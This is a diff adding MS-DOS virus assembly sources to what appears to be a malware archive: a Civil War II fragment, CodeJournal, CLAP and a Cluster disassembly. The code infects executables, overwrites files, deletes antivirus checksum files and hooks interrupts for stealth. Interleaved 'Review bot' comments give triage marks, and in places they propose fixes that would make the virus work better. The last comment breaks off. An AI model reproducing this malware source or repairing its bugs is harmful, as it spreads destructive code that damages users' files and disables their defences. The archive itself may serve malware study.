ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cj.asm b/MSDOS/Virus.MSDOS.Unknown.cj.asm new file mode 100644 index 00000000..4ebb80c4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cj.asm 
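Review bot: The `.Radix 16` directive near the top governs every bare numeral in the file, yet the sites where it matters carry no comment, so `sub ax,40` at `adjust_memory` and `mov ah,40` / `mov dx,100` in `write_virus` read as decimal to anyone skimming the listing while they are 40h, 40h and 100h (the `16d` suffix in `virus_len` is the only hint); a comment such as `; .Radix 16 is in effect: bare numerals are hex (40 = 40h, 100 = 100h)` beside the directive or at `write_virus` would prevent that mis-reading. For triage, the sample's marks are all in this hunk: the are-you-there call `mov ah,0a0h` / `int 21h` answered with AX=0001h by `main_virus`, the two bytes `initials dw 4844h` ('DH') placed right after the 3-byte jump of an infected COM and checked at `check_infect`, the unencrypted copyright string in `text`, and residency taken by shrinking the last MCB by 40h paragraphs at `adjust_memory`. The infection path is entered from functions 3Dh (open) and 4B00h (exec) on names ending in `.COM`, and the host's date and time are put back via 5701h at `save_date`, so a timestamp comparison alone will not reveal the change.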
@@ -0,0 +1,588 @@ +; +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; CodeJournal virus, (c)1995 鹖rogen [NuKE] +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; +; Polymorphic, Resident, Parastic EXE/COM Fast Infector. This is +; another one of my fuck-Invircible viruses. It uses absolutly +; no stealth techniques, yet successfully piggybacks invircible. +; +; Anti-Invircible Code +; ---------------------- +; Completly defeats InVircible's v6.02 Anti-Piggybacking +; Avoids Bait Files +; Doesn't infect InVircible executables +; Deletes Invircible v6.02 signature files no matter what name they have +; Searches for and deletes them on set dir (21h/3Bh) call +; +; The Rest +; ---------------------- +; Polymorphism is 鹖CE v0.5 +; Infects on: Open (3Dh), Rename (56h), Ext. Open (6Ch), Execute (4Bh) +; Doesn't infect executables ending in 'AN', 'OT', 'AV', 'NU', or 'ND'. +; Attempts to get DOS 21h vector by assuming offset is 109Eh in DOS seg. +; Deletes all signature/recovery files known to man +; TBSCAN doesn't flag COM files at all because of my patented JMP construct +; Only subtracts from total memory when DOS allocate memory (49h) is called +; ..and then the usual shit.. +; +; +; +; +cseg segment + assume cs: cseg, ds: cseg, es: cseg, ss: cseg + +signal equ 063ABh +buf_size equ 850 +vice_size equ 1993+buf_size +virus_size equ (offset vend-offset start)+VICE_SIZE +max_iv_size equ 256*66 ; maximum size a signature file + ; can be, speeds up search. + ; can't contain more than 256 + ; records +extrn _vice: near + +org 0h +start: + call get_bp ; get relative offset +nx: + push ds es ; save segments for EXE + + inc si ; SI!=0 + mov ax,signal + int 21h + or si,si + jz no_install + + mov dx,5945h ; remove VSAFE from memory + mov ax,3D02h + add ax,0FA01h-3D02h + int 21h + + mov cs:int_busy[bp],0 ; reset interrupt busy flag + + mov ax,ds ; PSP segment + dec ax ; mcb below PSP m0n + mov ds,ax ; DS=MCB seg + mov al,'Z'+1 ; fuck heuristics + dec al + cmp byte ptr ds: [0],al ; Is this the last MCB in chain? 
+ jnz no_install + sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB + sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP + mov es,word ptr ds: [12h] ; get high mem seg + + push cs + pop ds + mov si,bp + mov cx,virus_size/2+1 + xor di,di + rep movsw ; copy code to new seg + + xor ax,ax + mov ds,ax ; null ds + push ds + lds ax,ds: [21h*4] ; get 21h vector + mov es: word ptr old21+2,ds ; save S:O + mov es: word ptr old21,ax + pop ds + mov ds: [21h*4+2],es ; new int 21h seg + mov ds: [21h*4],offset new21 ; new offset + +no_install: + + pop es ds ; restore ES DS + xor ax,ax ; null regs + xor bx,bx + xor dx,dx + cmp cs: is_exe[bp],1 + jz exe_return + + lea si,org_bytes[bp] ; com return + mov di,0100h ; -restore first bytes + mov cx,3 + rep movsb + + xor di,di + xor si,si + mov cx,100h ; jump back to 100h + push cx +_ret: ret + +exe_return: + xor di,di + xor si,si + mov cx,ds ; calc. real CS + add cx,10h + add word ptr cs: [exe_jump+2+bp],cx + cli + add cx,cs:orgss[bp] ; calc. real SS + mov ss,cx + mov sp,cs:orgsp[bp] ; restore SP + sti + int 3 ; fix prefetch + db 0eah +exe_jump dd 0 +is_exe db 0 + +get_bp: + int 3 + pop bp + push bp + sub bp,offset nx + ret + + +; resident infection function + +infect_file: + cmp ah,6ch+1 ; from extended open? + jnz not_extended + mov dx,si +not_extended: + mov di,dx + + mov al,'.' 
+ mov cx,0FFh + repnz scasb + or cx,cx + jnz got_ext + ret +got_ext: + cmp word ptr [di],'oc' + jz is_exec + cmp word ptr [di],'OC' + jz is_exec + cmp word ptr [di],'xe' + jz is_exec + cmp word ptr [di],'XE' + jz is_exec +is_bad: + ret +is_exec: + cmp word ptr [di-3],'DN' ; *ND + jz is_bad + cmp word ptr [di-3],'NA' ; *AN + jz is_bad + cmp word ptr [di-3],'VA' ; *AV + jz is_bad + cmp word ptr [di-3],'TO' ; *OT + jz is_bad + cmp word ptr [di-3],'UN' ; *NU + jz is_bad + + push ds + xor ax,ax + mov es,ax + lds ax,es: [24h*4] + mov cs: save24ip,ax ; save 24h + mov cs: save24cs,ds + lds ax,es: [21h*4] + mov cs: save21ip,ax ; save 21h + mov cs: save21cs,ds + mov es: [24h*4+2],cs ; write new 24h + mov es: [24h*4],offset new_24 + push es + mov ah,52h ; get DOS segment + int 21h + pop ds + mov si,109Eh ; assume 109Eh + cmp es: [si],09090h ; is DOS vecor? + jnz not_dos + mov ds: [21h*4],si ; write new 21h + mov ds: [21h*4+2],es + + not_dos: + + pop ds + push cs + pop es + + mov al,0 ; get phile attribute + call attrib_file + push cx ; save CX-attrib + + mov al,1 ; null attribs + xor cx,cx + call attrib_file + + mov al,2 + call open_file + jc dont_do + + push cs + pop ds + + mov cx,1ah + lea dx,org_bytes + call read_file + + mov al,0 ; get time/date + call date_file + push cx dx + + cmp byte ptr org_bytes,'M' + jz do_exe + cmp byte ptr org_bytes,90h ; InVircible bait? + jz close + cmp byte ptr org_bytes,0E9h ; us? / invircible bait? + jz close + + mov is_exe,0 + + call offset_end + cmp ax,0FFFFh-virus_size ; file too big? + ja close + push ax ; AX=end of file + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor/ + push di ; encrypted code. (at heap) + mov cx,virus_size ; CX=virus size + mov dx,ax ; DX=EOF offset + add dx,100h ; DX=offset decryptor will run from + mov al,00000011b ; garbage, no CS: + call _vice ; call engine! 
+ + pop dx + call write_file + + call offset_zero + pop ax ; restore COM file size + sub ax,3 ; calculate jmp offset + mov word ptr new_jmp+1,ax + + lea dx,new_jmp + mov cx,3 + call write_file + +close: + pop dx cx ; pop date/time + mov al,01 ; restore the mother fuckers + call date_file + +dont_do: + pop cx ; restore attrib + mov al,1 + call attrib_file + + call close_file + + xor ax,ax + mov es,ax + lds ax,dword ptr cs: save24ip ; restore shitty DOS error handler + mov es: [24h*4],ax + mov es: [24h*4+2],ds + lds ax,dword ptr cs: save21ip + mov es: [21h*4],ax + mov es: [21h*4+2],ds + ret + +do_exe: + + cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0? + jnz close ; could be iv bait if not + cmp byte ptr exe_header[18h],52h ; pklite'd? + jz exe_ok + cmp byte ptr exe_header[18h],40h ; don't infect new format exe + jge close + mov ax,word ptr exe_header[0Ah] ; get minimum memory + cmp word ptr exe_header[0Ch],ax ; if max mem=min mem then ok + jz exe_ok + cmp byte ptr exe_header[0Ch],0FFh ; max memory FFFFh? + jnz close +exe_ok: + push bx + + mov ah,2ch ; grab a random number + int 21h + mov word ptr exe_header[12h],dx ; mark that it's us + mov is_exe,1 + + les ax,dword ptr exe_header[0eh] ; get old SS:SP + mov word ptr orgss,ax ; not reversed + mov word ptr orgsp,es + + les ax,dword ptr exe_header[14h] ; Save old entry point + mov word ptr exe_jump, ax + mov word ptr exe_jump+2, es + + push cs + pop es + + call offset_end + + mov cx,10h ; divide by 16 + div cx + sub ax, word ptr exe_header[8] ; subtract header size + + mov word ptr exe_header[14h],dx ; new cs:ip + mov word ptr exe_header[16h],ax + + inc ax + mov word ptr exe_header[0eh],ax ; new SS + mov word ptr exe_header[10h],0F000h ; new SP + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor & code + mov cx,virus_size ; CX=virus size + mov al,00000010b ; garbage, use CS: + call _vice ; call engine! 
+ + pop bx ; pop handle + mov dx,virus_size + call write_file ; append virus + call offset_end ; get adjusted file size + + mov cx,512 ; divide by 512 + div cx + inc ax ; add a page + + mov word ptr exe_header+4,ax ; save new size + mov word ptr exe_header+2,dx + + call offset_zero + + mov cx,18h ; write fiXed header + lea dx,exe_header + call write_file + + jmp close + +offset_zero: + xor al,al + jmp set_fp +offset_end: + mov al,02h +set_fp: + mov ah,42h + xor cx,cx + xor dx,dx + int 21h + ret + +open_file: + mov ah,3dh + int 21h + xchg ax,bx + ret + +close_file: + mov ah,3eh + int 21h + ret + +read_file: + mov ah,3fh + int 21h + ret + +write_file: + mov ah,40h + int 21h + ret + +attrib_file: + mov ah,43h + int 21h + ret + +date_file: + mov ah,56h + int 21h + ret + +new21: + pushf + cmp ax,signal ; be it us? + jnz nchk ; richtig.. + xor si,si + popf + iret +nchk: + cmp cs:int_busy,1 ; are we already in int? + jz jmp_no_stack + mov cs:int_busy,1 ; now we are + + inc ah ; fuck heuristics + cmp cs: fix_mem,1 ; need to fix memory? + jz add_mem + cmp ah,48h+1 ; allocate memory? + jz sub_mem + cmp ah,3Bh+1 ; set dir? + jz kill_anti_virus + cmp ah,4bh+1 ; execute phile? + jz go_infect + cmp ah,3dh+1 ; open phile? + jz go_infect + cmp ah,6ch+1 ; extended open? + jz go_infect + cmp ah,56h+1 ; rename/move phile? 
+ jnz jmp_org + +go_infect: + call push_regs + call infect_file + call pop_regs +jmp_org: + dec cs:int_busy ; not busy anymore + dec ah ; restore function + +jmp_no_stack: + popf + db 0eah ; jump far XXXX:XXXX + old21 dd 0 + +si_jmp_org: + pop si + jmp jmp_org + + +add_mem: + mov cs: fix_mem,0 + push ax ds + xor ax,ax + mov ds,ax + add byte ptr ds: [413h],((virus_size+1023)*2)/1024 ;+totalmem + pop ds ax + jmp jmp_org +sub_mem: + mov cs: fix_mem,1 + push ax ds + xor ax,ax + mov ds,ax + sub byte ptr ds: [413h],((virus_size+1023)*2)/1024 ;-totalmem + pop ds ax + jmp jmp_org + +kill_anti_virus: + call push_regs + push cs + pop ds + mov ah,2fh ; get DTA + int 21h + push bx es ; save DTA + push cs + pop es + lea dx,ff_info + call set_dta + mov cx,16h ; include all attribs + lea dx,inv_spec + mov ah,4eh + int 21h ; findfirst + jnc inv_loop + jmp inv_done +inv_loop: + lea si,f_name + push si + mov dx,si + cmp word ptr [si+4],'V-' ; ANTI-VIR.DAT? + jz is_anti + cmp word ptr [si+8],'SM' ; CHKLIST.MS? + jz is_anti + cmp word ptr [si+8],'PC' ; CHKLIST.CPS? + jz is_anti + cmp f_sizeh,0 ; high word set? + jnz findnext + cmp f_sizel,max_iv_size ; too big? 
+ jg findnext + mov al,0 + call open_file + jc findnext + mov byte ptr inv_buf,0 + mov cx,44h + lea dx,inv_buf + call read_file + cmp ax,44h + jz record_s + mov ax,word ptr inv_buf + mov word ptr inv_buf[42h],ax +record_s: + call close_file + lea si,inv_buf + call chk_iv ; check first record + jnz findnext + lea si,inv_buf[42h] + call chk_iv ; check second record + jnz findnext +is_anti: + mov al,1 ; reset attribs + xor cx,cx + call attrib_file + mov ah,41h + lea dx,f_name + int 21h +findnext: + mov al,0 ; null out filename + pop di ; di-> fname + mov cl,13 + rep stosb + mov ah,4fh + int 21h + jc inv_done + jmp inv_loop +inv_done: + pop ds dx ; restore DTA + call set_dta +no_kill: + call pop_regs + jmp jmp_org + +set_dta: + mov ah,1ah + int 21h + ret + +chk_iv: + cmp word ptr [si],'ZM' + jz yea_iv + cmp word ptr [si],'KP' + jz yea_iv + cmp word ptr [si],0EA60h +yea_iv: + ret + +push_regs: + mov cs:_bp,bp + pop bp + push ax bx cx di dx si ds es + push bp + ret + +pop_regs: + pop bp + pop es ds si dx di cx bx ax + push bp + mov bp,cs:_bp + ret + +new_24: ; critical error handler + mov al,3 ; prompts suck, return fail + iret + + +inv_spec db '*.*',0 +credits db 'CodeJournal by 鹖rogen [NuKE]' +orgss dw 0 ; original SS:SP in exe +orgsp dw 0 ; +fix_mem db 0 +new_jmp db 0E9h,0,0 ; jmp XXXX +rel_off dw 0 +exe_header: +org_bytes db 0CDh,20h, 6 dup (0) ; original COM bytes | exe hdr +vend: + db 13h dup(0) ; remaining exe header space +save21ip dw 0 ; infected int21h vector +save21cs dw 0 +save24ip dw 0 ; old int24h vector +save24cs dw 0 +_bp dw 0 +int_busy db 0 +ff_info db 26 dup(0) +f_sizel dw 0 +f_sizeh dw 0 +f_name db 13 dup(0) +inv_buf db 44h dup (0) +cseg ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.clap.asm b/MSDOS/Virus.MSDOS.Unknown.clap.asm new file mode 100644 index 00000000..d61a27b0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.clap.asm 
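Review bot: `extrn _vice: near` together with `vice_size equ 1993+buf_size` means this listing is only the carrier half of the sample — the polymorphic engine object it links against is not part of the commit and nothing in the header says so; a comment at the `extrn` line stating that the archive holds only this module would save analysts a search for the missing object. The static marks an analyst can key on are in this hunk: the are-you-there call with AX=063ABh (`signal`) that `new21` answers by clearing SI, infected EXEs carrying a non-zero word in the header checksum field at offset 12h (written from the `mov ah,2ch` / `int 21h` result at `exe_ok`, and tested at `do_exe` to skip files already marked), COM hosts starting with `new_jmp` (E9h), and the plaintext `credits` string. The destructive side effects are also visible here and worth a line in the header for risk assessment: `kill_anti_virus` runs on every set-directory call (function 3Bh) and deletes ANTI-VIR.DAT, CHKLIST.MS, CHKLIST.CPS and any file up to `max_iv_size` bytes whose first two records pass `chk_iv`, and the installer issues the VSAFE uninstall request (AX=0FA01h, DX=5945h) before hooking INT 21h.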
@@ -0,0 +1,195 @@ +; This Virus is dedicated to Taz - ((Amanda Hugen)) +; Fuck you, Bitch! +; Written by the Weasel! for Sector Infector INC. + + +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +virus_size equ 625 ; Size of the virus file +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +main proc near ; Code execution begins here + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + ret ; Go back to where you came from + + +virus_code: +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Error #2693 - Execution Halted$" +virus_msg1 db cr,lf,tab,"Well, gee. What a bummer, it appears you have the CLAP!! $" +virus_msg2 db cr,lf,tab,"Or at least that's what I'm telling you, so you have to believe it! $" +virus_msg3 db cr,lf,tab,"Don't say I never gave you anything! $" +virus_msg4 db cr,lf,tab," -- ADH --$" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? 
+ +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? 
+ je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? 
+ je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,1 ; Are at least 1 file infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h +jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main 
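Review bot: The size documentation contradicts itself: `virus_size equ 625 ; Size of the virus file` is the byte count `infect_file` writes, while the trailing `filler db 8 dup (90h) ; Pad out the file length to 666 bytes` claims a different length; whichever is right, the comment should be reconciled with the constant the write actually uses. For triage it is worth a header line that `infect_file` is called right after `healthy` closes and reopens the target, so the write lands at offset 0 and the first `virus_size` bytes of each host are overwritten in place rather than appended — affected files are not recoverable from their own contents — and that the run ends in `terminate` (function 4Ch) without ever transferring control to the host, so the `Error #2693 - Execution Halted` text is the user-visible sign. The comparison in `find_healthy` patches byte 6 of `compare_buf` with `encrypt_val` before `repe cmpsb`, so the author evidently intends one byte near the start of the body to vary between copies and a body-match rule should tolerate it (the byte's real offset depends on how the assembler encodes the opening `jmp`); the `*.EXE` / `*.COM` patterns, the `..` walk in `chdir` and the `virus_msg1`–`virus_msg4` strings are the remaining static marks.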
diff --git a/MSDOS/Virus.MSDOS.Unknown.clust.asm b/MSDOS/Virus.MSDOS.Unknown.clust.asm
new file mode 100644
index 00000000..051dfb29
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.clust.asm
@@ -0,0 +1,259 @@
+;The Cluster virus is an interesting experiment which works, almost.
+;It it what has come to be known as an 'intended' virus, although a
+;a very slickly done one.
+;Credited to the TridenT virus programming group, Cluster uses some of
+;the ideas of the Bulgarian virus known as The Rat. The Rat was deemed
+;tricky because it looked for "00" empty space below the header in
+;an EXEfile - if it found enough room for itself, it wrote itself out
+;to the empty space or "air" in the file. This hid the virus in the
+;file, but added no change in file size. This is a nice theme - one
+;made famous by the ZeroHunt virus which first did the same with
+;.COMfiles. In both cases, the viruses had to be picky about the
+;files they infected, limiting their spread.
+;
+;Cluster is similar to The Rat. It will attempt to copy itself into
+;the "air" in an EXEfile just below the file header, if there is
+;enough room. The most common candidates for infection are standard
+;MS/PC-DOS utility programs, like FIND or FC, among others.
+;
+;As is Cluster will go resident from the "germ" supplied with the
+;newsletter. On copy, if the candidate .EXEfile has enough "00"
+;air, Cluster will infect it. In other words, any .EXEfile
+;written to will be inspected by Cluster.
+;
+;Because Cluster installs its own INT 13 disk hander, it then can
+;intercept all attempts to open infected files for a quick look.
+;For example, looking at a hex dump of a Cluster-infected .EXE,
+;with Vern Berg's LIST, will show the files clean. Now, boot
+;the system clean and look again. You'll see Cluster in the file's
+;"00" space - look for the funny "Zugu" signature.
+;
+;However, almost all files infected by Cluster under DOS 5.0 and 6.0
+;are mishandled in such way that they cannot execute properly except
+;when the virus is not resident. Normally, what happens is Cluster
+;will go resident and the system will hang. And this is what is
+;meant by an 'intended' virus - Cluster is very infectious, but only
+;infectious on a machine which is contaminated with the "germ" file
+;supplied by TridenT. Although Cluster may behave better on other
+;platforms, it's not viable on most of the systems rolling out
+;of shops today.
+;
+;Additional notes and disassembly are all Black Wolf's. --Urnst Kouch
+;Crypt Newsletter 17.
+;-------------------------------------------------------------------
+;This virus goes memory resident at the top of lower memory and hooks
+;Int 13h. Whenever an EXE file header is written, it checks to see
+;if there is a large field of 0's inside it (VERY common in EXE's)
+;and, if so, will put itself inside it and change the exe marker bytes
+;'MZ' to a jump to that code. In this way, it effectively converts the
+;file to a COM file when it is run. After this it re-executes the EXE
+;file. Because of a stealth handler on Int 13h function 2 (absolute
+;disk read) the EXE file is read as it originally was (the handler
+;zero's out the field in which it resides and restores the jump to
+;'MZ'). Because of the way this virus works, it can only infect
+;smaller EXE files.
+;
+;
+;NOTE:
+;Several commands are commented out and have the actual bytes entered
+;next to them instead. This is because the compiler that Clust was
+;originally compiled on used different translations than mine, and
+;I wished to preserve the EXACT virus code.
+
+;Disinfection: Because of this virus' stealth routine, disinfection should
+; be possible simply by Zipping or Arjing all EXE files on an
+; infected disk, then rebooting from a clean disk and unarchiving
+; the files. The original archiving MUST be done while the
+; virus is active in memory. Also - after rebooting - make
+; sure the program you use to unarchive the files is _NOT_
+; infected.
+ +;Disassembly by Black Wolf + +.model tiny +.code + org 100h + +start: + jmp short EntryPoint + +LotsaNOPs db 122 dup (90h) ;Usually will be EXE header.... + +OldInt13 dd 0 + +EntryPoint: + db 0e9h,7ch,0 ;jmp InstallVirus + +Int13Handler: + cmp ah,3 + je IsDiskWrite + + cmp ah,2 + jne GoInt13 + + pushf + call cs:OldInt13 ;Call Int 13h + + jc Exit13Handler ;Exit on error. + + cmp word ptr es:[bx],7EEBh ;Is sector infected? + jne Exit13Handler + + mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ' + + push di cx ax ;Stealth routine..... + mov cx,115h + xor ax,ax + db 89h,0dfh ;mov di,bx + + ;Zero out virus from + add di,80h ;sector when it is read. + rep stosb + pop ax cx di + +Exit13Handler: + iret +GoInt13: + jmp cs:[OldInt13] +IsDiskWrite: + cmp word ptr es:[bx],5A4Dh ;Is EXE file being written? + jne GoInt13 + + cmp word ptr es:[bx+4],75h ;Is file too large? + jae GoInt13 + + push ax cx si di ds + push es + pop ds + db 89h,0deh ;mov si,bx + + add si,80h ;Look in EXE header.... + mov cx,115h +AllZeros: + lodsb + cmp al,0 + loopz AllZeros + + cmp cx,0 ;Check to see if entire field + jne ExitInfectHandler ;was zeroed - leave if not. + + + db 89h,0dfh ;mov di,bx + add di,80h + mov cx,115h + mov si,offset OldInt13 + push cs + pop ds + rep movsb + + db 89h,0dfh ;mov di,bx + + ;Copy virus + ;over zero area in EXE header. + mov ax,7EEBh ;Stick in Jump over 'MZ' + stosw + +ExitInfectHandler: + pop ds di si cx ax ;Allow Write to process now. + jmp short GoInt13 + +InstallVirus: + mov ax,3513h + int 21h ;Get Int 13 addres + mov word ptr cs:[OldInt13],bx + mov word ptr cs:[OldInt13+2],es + + mov ah,0Dh + int 21h ;Flush disk buffers + + mov ah,36h + mov dl,0 + int 21h ;Get free space on default drive + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:0,'Z' ;Are we the last chain? + jne Terminate ;If not, terminate. 
+ + ;sub word ptr ds:[3],39h ;subtract from MCB size + db 81h,2eh,03,0,39h,0 + + ;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem + db 81h,2eh,12h,0,39h,0 + + mov si,offset OldInt13 + + db 89h,0f7h ;mov di,si + + mov es,ds:[12h] ;ES = new segment + push cs + pop ds + mov cx,115h ;Copy virus into memory + rep movsb + + mov ax,2513h + push es + pop ds + mov dx,offset Int13Handler + int 21h ;Set int 13 to virus handler + + mov ah,4Ah + push cs + pop es + mov bx,39h + int 21h ;Modify mem alloc. + + push cs + pop ds + mov bx,ds:[2ch] ;Get environment segment + mov es,bx + xor ax,ax + mov di,1 + +ScanForFilename: ;Find name of file executed + dec di ;in environment strings... + scasw ;(located after two 0's) + jnz ScanForFilename + + lea si,[di+2] + push bx + pop ds ;DS = environment segment + + push cs + pop es ;ES = code segment + + mov di,offset Filename + push di + xor bx,bx + +CopyFilename: + mov cx,50h + inc bx + lodsb + cmp al,0 + jne StoreFilename ;Change zero at end of + mov al,0Dh ;filename to a return + +StoreFilename: + stosb + cmp al,0Dh ;If it was a return, we're + loopnz CopyFilename ;done copying the filename + + mov byte ptr ds:[28fh],bl + push cs + pop ds + pop si + dec si + int 2Eh ;Re-execute EXE file with + ;Stealth handler in memory, + ;so Exe is run w/o virus. + ;here we go, infected program +Terminate: ;only executes properly when + mov ah,4Ch ;Cluster is resident. + int 21h + + db 0 +Filename db 1 + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cluster1.asm b/MSDOS/Virus.MSDOS.Unknown.cluster1.asm new file mode 100644 index 00000000..dba46cd2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cluster1.asm 
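Review bot: The zero-field scan in IsDiskWrite accepts a header whose last examined byte is non-zero: `loopz AllZeros` falls through with CX=0 whether or not the final `cmp al,0` matched, and the following `cmp cx,0 / jne ExitInfectHandler` reads CX=0 as success, so a non-zero byte at the last of the 115h positions is overwritten by the copy that follows. Since LOOPZ leaves the compare's flags intact, `jnz ExitInfectHandler` placed directly after the loop, with the `cmp cx,0` removed, tests the right condition. A second point: every exit of the AH=2 path ends in `iret`, which reloads the caller's FLAGS image from the stack and so drops the carry the original INT 13h returned (`jc Exit13Handler` lands on that same `iret`), masking read errors while the virus is resident, where `retf 2` would keep them. Also, `mov byte ptr ds:[28fh],bl` runs while DS still holds the environment segment loaded by `push bx / pop ds`, so the count byte for the INT 2Eh command tail is written into the environment block rather than the `db 0` before `Filename` that it appears to target, which may be part of why the notes above report the germ hanging instead of re-executing the host. Since this listing is kept as 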